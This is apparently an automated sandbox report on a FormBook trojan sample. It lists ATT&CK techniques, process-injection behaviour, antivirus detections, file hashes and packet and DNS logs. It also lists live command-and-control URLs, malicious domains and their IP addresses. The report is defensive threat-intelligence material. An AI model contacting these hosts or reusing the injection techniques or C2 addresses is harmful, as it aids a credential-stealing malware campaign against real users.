          Encrypted Channel
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Disable or Modify Tools
          LSASS Memory2
          Process Discovery
          Remote Desktop Protocol1
          Archive Collected Data
          Exfiltration Over Bluetooth3
          Ingress Tool Transfer
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
          Virtualization/Sandbox Evasion
          Security Account Manager31
          Virtualization/Sandbox Evasion
          SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
          Non-Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)812
          Process Injection
          NTDS1
          Remote System Discovery
          Distributed Component Object ModelInput CaptureScheduled Transfer13
          Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information
          LSA Secrets112
          System Information Discovery
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common3
          Obfuscated Files or Information
          Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items3
          Software Packing
          DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 626604 Sample: fooYgfbxno Startdate: 14/05/2022 Architecture: WINDOWS Score: 100 29 www.xn--ekrt15fxyb2t2c.xn--czru2d 2->29 45 Snort IDS alert for network traffic 2->45 47 Multi AV Scanner detection for domain / URL 2->47 49 Found malware configuration 2->49 51 6 other signatures 2->51 10 fooYgfbxno.exe 1 2->10         started        signatures3 process4 file5 27 C:\Users\user\AppData\...\fooYgfbxno.exe.log, ASCII 10->27 dropped 53 Writes to foreign memory regions 10->53 55 Allocates memory in foreign processes 10->55 57 Injects a PE file into a foreign processes 10->57 14 aspnet_compiler.exe 10->14         started        signatures6 process7 signatures8 59 Modifies the context of a thread in another process (thread injection) 14->59 61 Maps a DLL or memory area into another process 14->61 63 Sample uses process hollowing technique 14->63 65 2 other signatures 14->65 17 svchost.exe 14->17         started        20 explorer.exe 14->20 injected process9 dnsIp10 37 Modifies the context of a thread in another process (thread injection) 17->37 39 Maps a DLL or memory area into another process 17->39 41 Tries to detect virtualization through RDTSC time measurements 17->41 23 cmd.exe 1 17->23         started        31 www.hofwimmer.com 20->31 33 www.mentalnayaarifmetika.online 185.68.16.179, 49763, 80 UKRAINE-ASUA Ukraine 20->33 35 9 other IPs or domains 20->35 43 System process connects to network (likely due to code injection or exploit) 20->43 signatures11 process12 process13 25 conhost.exe 23->25         started       

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          fooYgfbxno.exe32%VirustotalBrowse
          fooYgfbxno.exe44%ReversingLabsWin32.Trojan.Swotter
          fooYgfbxno.exe100%Joe Sandbox ML
          No Antivirus matches
          SourceDetectionScannerLabelLinkDownload
          2.0.aspnet_compiler.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.2.aspnet_compiler.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.0.aspnet_compiler.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.0.aspnet_compiler.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          SourceDetectionScannerLabelLink
          lotsimprovements.com8%VirustotalBrowse
          www.huvao.com2%VirustotalBrowse
          www.chambaultfleurs.com3%VirustotalBrowse
          www.xn--hj2bz6fwvan2be1g5tb.com4%VirustotalBrowse
          SourceDetectionScannerLabelLink
          http://www.chambaultfleurs.com/ocgr/?lfvx9=JFNTlvkP_&P2Jl4=TZNys7210trfg8O8WBMuzy6C02I8maceBl4kNVlEZuNH+N4fd/TFP34Py3WDgrqbJJxT100%Avira URL Cloudmalware
          http://www.lotsimprovements.com/ocgr/?P2Jl4=o9xz2vqcTVXu/W078IUcrzT+VrP3S9wZB9suAAi9fTl7LQCsWydvJWt3Uuk2q/fLQQGI&lfvx9=JFNTlvkP_100%Avira URL Cloudmalware
          http://www.xn--hj2bz6fwvan2be1g5tb.com/ocgr/?lfvx9=JFNTlvkP_&P2Jl4=zPygAtD4LGfbsOxaPXlKDZlA/HZsirEX7sJv7vNHedMyDqAMsgZk6w8aA/BuIJhq09F8100%Avira URL Cloudmalware
          http://www.huvao.com/ocgr/?P2Jl4=1BqqsZcQDAJnvcG+ktWW1SuLtWUnTVqW01xF9ocnHpFG4dYykDk5mjpX7chd6+Nfhcmp&lfvx9=JFNTlvkP_100%Avira URL Cloudmalware
          www.mentalnayaarifmetika.online/ocgr/100%Avira URL Cloudmalware
          http://www.mentalnayaarifmetika.online/ocgr/?P2Jl4=WCPK4waC2+ZoHrOc/rbcYrxYoSsYkto1AfFtfo68nJJBD8+b6aAxZ/giJh8W0WW05dhF&lfvx9=JFNTlvkP_100%Avira URL Cloudmalware
          NameIPActiveMaliciousAntivirus DetectionReputation
          lotsimprovements.com
          209.15.40.102
          truetrueunknown
          www.huvao.com
          104.21.89.61
          truetrueunknown
          www.chambaultfleurs.com
          213.186.33.5
          truetrueunknown
          www.xn--hj2bz6fwvan2be1g5tb.com
          61.14.208.3
          truetrueunknown
          www.hofwimmer.com
          206.189.50.60
          truetrue
            unknown
            www.mentalnayaarifmetika.online
            185.68.16.179
            truetrue
              unknown
              www.myamazonloan.net
              unknown
              unknowntrue
                unknown
                www.lotsimprovements.com
                unknown
                unknowntrue
                  unknown
                  www.zyaxious.website
                  unknown
                  unknowntrue
                    unknown
                    www.doxofcolor.com
                    unknown
                    unknowntrue
                      unknown
                      www.xn--ekrt15fxyb2t2c.xn--czru2d
                      unknown
                      unknowntrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        http://www.chambaultfleurs.com/ocgr/?lfvx9=JFNTlvkP_&P2Jl4=TZNys7210trfg8O8WBMuzy6C02I8maceBl4kNVlEZuNH+N4fd/TFP34Py3WDgrqbJJxTtrue
                        • Avira URL Cloud: malware
                        unknown
                        http://www.lotsimprovements.com/ocgr/?P2Jl4=o9xz2vqcTVXu/W078IUcrzT+VrP3S9wZB9suAAi9fTl7LQCsWydvJWt3Uuk2q/fLQQGI&lfvx9=JFNTlvkP_true
                        • Avira URL Cloud: malware
                        unknown
                        http://www.xn--hj2bz6fwvan2be1g5tb.com/ocgr/?lfvx9=JFNTlvkP_&P2Jl4=zPygAtD4LGfbsOxaPXlKDZlA/HZsirEX7sJv7vNHedMyDqAMsgZk6w8aA/BuIJhq09F8true
                        • Avira URL Cloud: malware
                        unknown
                        http://www.huvao.com/ocgr/?P2Jl4=1BqqsZcQDAJnvcG+ktWW1SuLtWUnTVqW01xF9ocnHpFG4dYykDk5mjpX7chd6+Nfhcmp&lfvx9=JFNTlvkP_true
                        • Avira URL Cloud: malware
                        unknown
                        www.mentalnayaarifmetika.online/ocgr/true
                        • Avira URL Cloud: malware
                        low
                        http://www.mentalnayaarifmetika.online/ocgr/?P2Jl4=WCPK4waC2+ZoHrOc/rbcYrxYoSsYkto1AfFtfo68nJJBD8+b6aAxZ/giJh8W0WW05dhF&lfvx9=JFNTlvkP_true
                        • Avira URL Cloud: malware
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://adm.tools/support/svchost.exe, 0000000C.00000002.530690734.0000000003FB2000.00000004.10000000.00040000.00000000.sdmpfalse
                          high
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          104.21.89.61
                          www.huvao.comUnited States
                          13335CLOUDFLARENETUStrue
                          185.68.16.179
                          www.mentalnayaarifmetika.onlineUkraine
                          200000UKRAINE-ASUAtrue
                          213.186.33.5
                          www.chambaultfleurs.comFrance
                          16276OVHFRtrue
                          209.15.40.102
                          lotsimprovements.comCanada
                          13768COGECO-PEER1CAtrue
                          61.14.208.3
                          www.xn--hj2bz6fwvan2be1g5tb.comKorea Republic of
                          45382EHOSTIDC-AS-KREHOSTICTKRtrue
                          206.189.50.60
                          www.hofwimmer.comUnited States
                          14061DIGITALOCEAN-ASNUStrue
                          Joe Sandbox Version:34.0.0 Boulder Opal
                          Analysis ID:626604
                          Start date and time: 14/05/202215:27:262022-05-14 15:27:26 +02:00
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 9m 20s
                          Hypervisor based Inspection enabled:false
                          Report type:light
                          Sample file name:fooYgfbxno (renamed file extension from none to exe)
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                          Number of analysed new started processes analysed:25
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:1
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@8/1@10/6
                          EGA Information:
                          • Successful, ratio: 100%
                          HDC Information:
                          • Successful, ratio: 53.3% (good quality ratio 48.9%)
                          • Quality average: 73.4%
                          • Quality standard deviation: 30.6%
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Adjust boot time
                          • Enable AMSI
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 40.125.122.176, 52.242.101.226, 20.223.24.244
                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, arc.msn.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                          • Not all processes where analyzed, report is missing behavior information
                          No simulations
                          No context
                          No context
                          No context
                          No context
                          No context
                          Process:C:\Users\user\Desktop\fooYgfbxno.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):323
                          Entropy (8bit):5.341038075456123
                          Encrypted:false
                          SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2LDY3U21t92W+P12MUAvvrs:Q3La/KDLI4MWuPk21t92n4M6
                          MD5:9FEAEEB3F595D644B8A003CA116508D1
                          SHA1:E2A4B06B16147F0C77AE2839DF37E9FFEB645DBE
                          SHA-256:37C92A24F9BD9FBF354209FE9DDA880B5B9C117F2CC863764EFD7F303548696D
                          SHA-512:DAE054E5DB8E869347F415FA57150B352381D1EBB90CF3D67BBFF69B4B27E0F2047E24B4E2BE36EE79EE2E94E766533772E9FF61969805C3709BD94906DBF2BA
                          Malicious:true
                          Reputation:moderate, very likely benign file
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Entropy (8bit):7.903722597215708
                          TrID:
                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                          • Win32 Executable (generic) a (10002005/4) 49.78%
                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                          • Generic Win/DOS Executable (2004/3) 0.01%
                          • DOS Executable Generic (2002/1) 0.01%
                          File name:fooYgfbxno.exe
                          File size:229376
                          MD5:ce42fe431b88922ab59b6fd880cadcf6
                          SHA1:652914d960da1d37d270db7f6e3b07c9d4b0e3a9
                          SHA256:4d8cc87942499042195cec4fdb2fc5869d4bf98a1d827fd30fb74e82cf0fdc0f
                          SHA512:62b30a77cb2ef3491abb3ec517ca966c4a9eafa0f263118ba817a4ce87f8d3cddc014bce25ff268435b7f69605e6c14b8031b482f7caf00e855964c618c609ba
                          SSDEEP:3072:AZZ8kwSCcwugf3DaUrpXtKY/c3QSXCjE/jIgQW9BPnXKWIhmpCCBHhGThql:mCugfz/5t//sTXC2b3rPXahqC
                          TLSH:FA2402A067E9DF27C38D3BB2981A2B913338D502B717BF1B640904BDCC537D854E9656
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....~b.................v...|........... ........@.. ....................................`................................
                          Icon Hash:00828e8e8686b000
                          Entrypoint:0x4395ca
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, LINE_NUMS_STRIPPED
                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                          Time Stamp:0x627E1FBA [Fri May 13 09:07:06 2022 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:v4.0.30319
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                          Instruction
                          jmp dword ptr [00402000h]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x395700x57.text
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x3c0000x5c8.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x3a0000xc.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x350180x1c.text
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x20000x375d00x37600False0.946846783296data7.92488075838IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                          .reloc0x3a0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          .rsrc0x3c0000x5c80x600False0.422526041667data4.17915724205IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          NameRVASizeTypeLanguageCountry
                          RT_VERSION0x3c0a00x33cdata
                          RT_MANIFEST0x3c3dc0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                          DLLImport
                          mscoree.dll_CorExeMain
                          DescriptionData
                          Translation0x0000 0x04b0
                          LegalCopyrightCopyright 2022
                          Assembly Version1.0.0.0
                          InternalNameBMCXBMXCKSKS.exe
                          FileVersion1.0.0.0
                          CompanyName
                          LegalTrademarks
                          Comments
                          ProductNameBMCXBMXCKSKS
                          ProductVersion1.0.0.0
                          FileDescriptionBMCXBMXCKSKS
                          OriginalFilenameBMCXBMXCKSKS.exe
                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                          192.168.2.361.14.208.349768802031412 05/14/22-15:30:39.400782TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976880192.168.2.361.14.208.3
                          192.168.2.361.14.208.349768802031453 05/14/22-15:30:39.400782TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976880192.168.2.361.14.208.3
                          192.168.2.361.14.208.349768802031449 05/14/22-15:30:39.400782TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976880192.168.2.361.14.208.3
                          TimestampSource PortDest PortSource IPDest IP
                          May 14, 2022 15:30:02.216365099 CEST4976080192.168.2.3104.21.89.61
                          May 14, 2022 15:30:02.249017000 CEST8049760104.21.89.61192.168.2.3
                          May 14, 2022 15:30:02.249130011 CEST4976080192.168.2.3104.21.89.61
                          May 14, 2022 15:30:02.249274015 CEST4976080192.168.2.3104.21.89.61
                          May 14, 2022 15:30:02.280647039 CEST8049760104.21.89.61192.168.2.3
                          May 14, 2022 15:30:02.290631056 CEST8049760104.21.89.61192.168.2.3
                          May 14, 2022 15:30:02.294136047 CEST4976080192.168.2.3104.21.89.61
                          May 14, 2022 15:30:02.325537920 CEST8049760104.21.89.61192.168.2.3
                          May 14, 2022 15:30:02.530217886 CEST8049760104.21.89.61192.168.2.3
                          May 14, 2022 15:30:02.530329943 CEST4976080192.168.2.3104.21.89.61
                          May 14, 2022 15:30:12.656078100 CEST4976380192.168.2.3185.68.16.179
                          May 14, 2022 15:30:12.699554920 CEST8049763185.68.16.179192.168.2.3
                          May 14, 2022 15:30:12.699672937 CEST4976380192.168.2.3185.68.16.179
                          May 14, 2022 15:30:12.699805021 CEST4976380192.168.2.3185.68.16.179
                          May 14, 2022 15:30:12.743258953 CEST8049763185.68.16.179192.168.2.3
                          May 14, 2022 15:30:12.743716955 CEST8049763185.68.16.179192.168.2.3
                          May 14, 2022 15:30:12.743794918 CEST8049763185.68.16.179192.168.2.3
                          May 14, 2022 15:30:12.743937016 CEST4976380192.168.2.3185.68.16.179
                          May 14, 2022 15:30:12.747823954 CEST4976380192.168.2.3185.68.16.179
                          May 14, 2022 15:30:12.791331053 CEST8049763185.68.16.179192.168.2.3
                          May 14, 2022 15:30:17.808177948 CEST4976480192.168.2.3213.186.33.5
                          May 14, 2022 15:30:17.837434053 CEST8049764213.186.33.5192.168.2.3
                          May 14, 2022 15:30:17.837635040 CEST4976480192.168.2.3213.186.33.5
                          May 14, 2022 15:30:17.837791920 CEST4976480192.168.2.3213.186.33.5
                          May 14, 2022 15:30:17.867481947 CEST8049764213.186.33.5192.168.2.3
                          May 14, 2022 15:30:17.867533922 CEST8049764213.186.33.5192.168.2.3
                          May 14, 2022 15:30:17.867758036 CEST4976480192.168.2.3213.186.33.5
                          May 14, 2022 15:30:17.867816925 CEST4976480192.168.2.3213.186.33.5
                          May 14, 2022 15:30:17.896970034 CEST8049764213.186.33.5192.168.2.3
                          May 14, 2022 15:30:28.312823057 CEST4976580192.168.2.3206.189.50.60
                          May 14, 2022 15:30:28.353809118 CEST8049765206.189.50.60192.168.2.3
                          May 14, 2022 15:30:28.353918076 CEST4976580192.168.2.3206.189.50.60
                          May 14, 2022 15:30:28.354022026 CEST4976580192.168.2.3206.189.50.60
                          May 14, 2022 15:30:28.394854069 CEST8049765206.189.50.60192.168.2.3
                          May 14, 2022 15:30:28.396599054 CEST8049765206.189.50.60192.168.2.3
                          May 14, 2022 15:30:28.396655083 CEST8049765206.189.50.60192.168.2.3
                          May 14, 2022 15:30:28.396800041 CEST4976580192.168.2.3206.189.50.60
                          May 14, 2022 15:30:28.396851063 CEST4976580192.168.2.3206.189.50.60
                          May 14, 2022 15:30:28.437733889 CEST8049765206.189.50.60192.168.2.3
                          May 14, 2022 15:30:33.578761101 CEST4976780192.168.2.3209.15.40.102
                          May 14, 2022 15:30:33.678956032 CEST8049767209.15.40.102192.168.2.3
                          May 14, 2022 15:30:33.679131985 CEST4976780192.168.2.3209.15.40.102
                          May 14, 2022 15:30:33.679238081 CEST4976780192.168.2.3209.15.40.102
                          May 14, 2022 15:30:33.779376984 CEST8049767209.15.40.102192.168.2.3
                          May 14, 2022 15:30:33.779448032 CEST8049767209.15.40.102192.168.2.3
                          May 14, 2022 15:30:33.779484987 CEST8049767209.15.40.102192.168.2.3
                          May 14, 2022 15:30:33.779680967 CEST4976780192.168.2.3209.15.40.102
                          May 14, 2022 15:30:33.779741049 CEST4976780192.168.2.3209.15.40.102
                          May 14, 2022 15:30:33.879672050 CEST8049767209.15.40.102192.168.2.3
                          May 14, 2022 15:30:39.118415117 CEST4976880192.168.2.361.14.208.3
                          May 14, 2022 15:30:39.400279045 CEST804976861.14.208.3192.168.2.3
                          May 14, 2022 15:30:39.400459051 CEST4976880192.168.2.361.14.208.3
                          May 14, 2022 15:30:39.400782108 CEST4976880192.168.2.361.14.208.3
                          May 14, 2022 15:30:39.682413101 CEST804976861.14.208.3192.168.2.3
                          May 14, 2022 15:30:39.686490059 CEST804976861.14.208.3192.168.2.3
                          May 14, 2022 15:30:39.686532974 CEST804976861.14.208.3192.168.2.3
                          May 14, 2022 15:30:39.686790943 CEST4976880192.168.2.361.14.208.3
                          May 14, 2022 15:30:39.686932087 CEST4976880192.168.2.361.14.208.3
                          May 14, 2022 15:30:39.968940973 CEST804976861.14.208.3192.168.2.3
                          TimestampSource PortDest PortSource IPDest IP
                          May 14, 2022 15:29:57.018431902 CEST6535853192.168.2.38.8.8.8
                          May 14, 2022 15:29:57.039163113 CEST53653588.8.8.8192.168.2.3
                          May 14, 2022 15:30:02.187118053 CEST5380253192.168.2.38.8.8.8
                          May 14, 2022 15:30:02.212249041 CEST53538028.8.8.8192.168.2.3
                          May 14, 2022 15:30:07.308743954 CEST6526653192.168.2.38.8.8.8
                          May 14, 2022 15:30:07.481030941 CEST53652668.8.8.8192.168.2.3
                          May 14, 2022 15:30:12.526714087 CEST6354853192.168.2.38.8.8.8
                          May 14, 2022 15:30:12.654772997 CEST53635488.8.8.8192.168.2.3
                          May 14, 2022 15:30:17.764430046 CEST4932753192.168.2.38.8.8.8
                          May 14, 2022 15:30:17.807101965 CEST53493278.8.8.8192.168.2.3
                          May 14, 2022 15:30:22.914521933 CEST5139153192.168.2.38.8.8.8
                          May 14, 2022 15:30:23.257592916 CEST53513918.8.8.8192.168.2.3
                          May 14, 2022 15:30:28.291429043 CEST5898153192.168.2.38.8.8.8
                          May 14, 2022 15:30:28.311923981 CEST53589818.8.8.8192.168.2.3
                          May 14, 2022 15:30:33.409121037 CEST6138053192.168.2.38.8.8.8
                          May 14, 2022 15:30:33.577389002 CEST53613808.8.8.8192.168.2.3
                          May 14, 2022 15:30:38.794498920 CEST6314653192.168.2.38.8.8.8
                          May 14, 2022 15:30:39.116885900 CEST53631468.8.8.8192.168.2.3
                          May 14, 2022 15:30:44.699068069 CEST5862553192.168.2.38.8.8.8
                          May 14, 2022 15:30:45.482522011 CEST53586258.8.8.8192.168.2.3
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                          May 14, 2022 15:29:57.018431902 CEST192.168.2.38.8.8.80x15dbStandard query (0)www.doxofcolor.comA (IP address)IN (0x0001)
                          May 14, 2022 15:30:02.187118053 CEST192.168.2.38.8.8.80xfb0eStandard query (0)www.huvao.comA (IP address)IN (0x0001)
                          May 14, 2022 15:30:07.308743954 CEST192.168.2.38.8.8.80x11ddStandard query (0)www.myamazonloan.netA (IP address)IN (0x0001)
                          May 14, 2022 15:30:12.526714087 CEST192.168.2.38.8.8.80xe8d6Standard query (0)www.mentalnayaarifmetika.onlineA (IP address)IN (0x0001)
                          May 14, 2022 15:30:17.764430046 CEST192.168.2.38.8.8.80x704dStandard query (0)www.chambaultfleurs.comA (IP address)IN (0x0001)
                          May 14, 2022 15:30:22.914521933 CEST192.168.2.38.8.8.80x31c3Standard query (0)www.zyaxious.websiteA (IP address)IN (0x0001)
                          May 14, 2022 15:30:28.291429043 CEST192.168.2.38.8.8.80x6d5eStandard query (0)www.hofwimmer.comA (IP address)IN (0x0001)
                          May 14, 2022 15:30:33.409121037 CEST192.168.2.38.8.8.80xb05bStandard query (0)www.lotsimprovements.comA (IP address)IN (0x0001)
                          May 14, 2022 15:30:38.794498920 CEST192.168.2.38.8.8.80x5598Standard query (0)www.xn--hj2bz6fwvan2be1g5tb.comA (IP address)IN (0x0001)
                          May 14, 2022 15:30:44.699068069 CEST192.168.2.38.8.8.80xd859Standard query (0)www.xn--ekrt15fxyb2t2c.xn--czru2dA (IP address)IN (0x0001)
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                          May 14, 2022 15:29:57.039163113 CEST8.8.8.8192.168.2.30x15dbName error (3)www.doxofcolor.comnonenoneA (IP address)IN (0x0001)
                          May 14, 2022 15:30:02.212249041 CEST8.8.8.8192.168.2.30xfb0eNo error (0)www.huvao.com104.21.89.61A (IP address)IN (0x0001)
                          May 14, 2022 15:30:02.212249041 CEST8.8.8.8192.168.2.30xfb0eNo error (0)www.huvao.com172.67.138.124A (IP address)IN (0x0001)
                          May 14, 2022 15:30:07.481030941 CEST8.8.8.8192.168.2.30x11ddServer failure (2)www.myamazonloan.netnonenoneA (IP address)IN (0x0001)
                          May 14, 2022 15:30:12.654772997 CEST8.8.8.8192.168.2.30xe8d6No error (0)www.mentalnayaarifmetika.online185.68.16.179A (IP address)IN (0x0001)
                          May 14, 2022 15:30:17.807101965 CEST8.8.8.8192.168.2.30x704dNo error (0)www.chambaultfleurs.com213.186.33.5A (IP address)IN (0x0001)
                          May 14, 2022 15:30:28.311923981 CEST8.8.8.8192.168.2.30x6d5eNo error (0)www.hofwimmer.com206.189.50.60A (IP address)IN (0x0001)
                          May 14, 2022 15:30:28.311923981 CEST8.8.8.8192.168.2.30x6d5eNo error (0)www.hofwimmer.com167.99.246.105A (IP address)IN (0x0001)
